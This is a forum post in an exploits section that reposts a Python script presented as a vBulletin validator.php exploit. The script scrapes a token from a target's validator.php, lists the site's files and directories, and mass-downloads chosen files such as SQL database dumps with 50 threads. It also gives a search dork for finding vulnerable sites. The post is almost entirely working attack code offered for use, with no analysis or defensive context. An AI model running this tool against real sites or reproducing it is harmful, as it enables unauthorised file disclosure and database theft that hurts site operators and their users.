Jump to content
Aripipevant

vBulletin (Validator.php) Exploit

By Aripipevant, in Exploituri

Recommended Posts

Aripipevant Newbie

Aripipevant

Posted
Posted 

#! /usr/bin/env python3.1

#

################################################################

# ____ _ _ _ _ (validator.php) #

# | _ \ | | | | | (_) #

# __ _| |_) |_ _| | | ___| |_ _ _ __ #

# \ \ / / _ <| | | | | |/ _ \ __| | '_ \ #

# \ V /| |_) | |_| | | | __/ |_| | | | | #

# \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| #

# @expl0it... #

################################################################

# [ vBulletin Files / Directories Full Disclosure ] #

################################################################

# #

################################################################



import os, sys, urllib.request, urllib.parse, threading



def main():

logo = """

\t |---------------------------------------------------------------|

\t | ____ _ _ _ _ (TM) |

\t | | _ \ | | | | | (_) |

\t | __ _| |_) |_ _| | | ___| |_ _ _ __ |

\t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ |

\t | \ V /| |_) | |_| | | | __/ |_| | | | | |

\t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| |

\t | |

\t | vBulletin Full Disclosure expl0it |

\t | Written by cmiN |

\t | Vulnerability discovered by ******* |

\t | |

\t | Dork: intext:"Powered by vBulletin" |

\t | Visit: www.insecurity.ro & www.darkc0de.com |

\t |---------------------------------------------------------------|

"""

usage = """

|---------------------------------------------------------------|

|Usage: vbfd.py scan http://www.site.com/vB_folder |

| vbfd.py download *.sql -> all |

| vbfd.py download name.jpg -> one |

|---------------------------------------------------------------|"""

if sys.platform in ("linux", "linux2"):

clearing = "clear"

else:

clearing = "cls"

os.system(clearing)

print(logo)

args = sys.argv

if len(args) == 3:

try:

print("Please wait...")

if args[1] == "scan":

extract_parse_save(args[2].strip("/"))

elif args[1] == "download":

download_data(args[2])

except Exception as message:

print("An error occurred: {}".format(message))

except:

print("Unknown error.")

else:

print("Ready!")

else:

print(usage)

input()



def extract_parse_save(url):

print("[+]Extracting content...")

hurl = url + "/validator.php"

with urllib.request.urlopen(hurl) as usock:

source = usock.read().decode()

print("[+]Finding token...")

word = "validate('"

source = source[source.index(word) + len(word):]

value = source[:source.index("'")]

print("[+]Obtaining paths...")

hurl = url + "/validator.php?op={}".format(value)

with urllib.request.urlopen(hurl) as usock:

lastk, lastv = None, None

dictionary = dict()

for line in usock:

line = line.decode()

index = line.find("<td>")

if index != -1:

lastk = line[index + 4:line.index("</td>")].strip(" ")

index = line.find("<strong>")

if index != -1:

lastv = line[index + 8:line.index("</strong>")].strip(" ")

if lastk != None and lastv != None:

index = lastk.rfind(".")

if index in (-1, 0):

lastk = "[other] {}".format(lastk)

else:

lastk = "[{}] {}".format(lastk[index + 1:], lastk)

dictionary[lastk] = lastv

lastk, lastv = None, None

print("[+]Organizing and saving paths...")

with open("vBlogs.txt", "w") as fout:

fout.write(url + "\n")

keys = sorted(dictionary.keys())

for key in keys:

fout.write("{} ({})\n".format(key, dictionary[key]))



def download_data(files):

print("[+]Searching and downloading files...")

mthreads = 50

with open("vBlogs.txt", "r") as fin:

url = fin.readline().strip("\n")

if files.find("*") == -1:

hurl = url + "/" + files.strip("/")

Download(hurl).start()

else:

ext = files[files.rindex(".") + 1:]

for line in fin:

pieces = line.strip("\n").split(" ")

if pieces[0].count(ext) == 1:

upath = pieces[1]

hurl = url + "/" + upath.strip("/")

while threading.active_count() > mthreads:

pass

Download(hurl).start()

while threading.active_count() > 1:

pass



class Download(threading.Thread):



def __init__(self, url):

threading.Thread.__init__(self)

self.url = url



def run(self):

try:

with urllib.request.urlopen(self.url) as usock:

data = usock.read()

uparser = urllib.parse.urlparse(usock.geturl())

pieces = uparser.path.split("/")

fname = pieces[len(pieces) - 1]

with open(fname, "wb") as fout:

fout.write(data)

except:

pass



if __name__ == "__main__":

main()

Sursa: https://securityoversight.net/forum/index.php?/topic/127-vbulletin-validatorphp-exploit/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...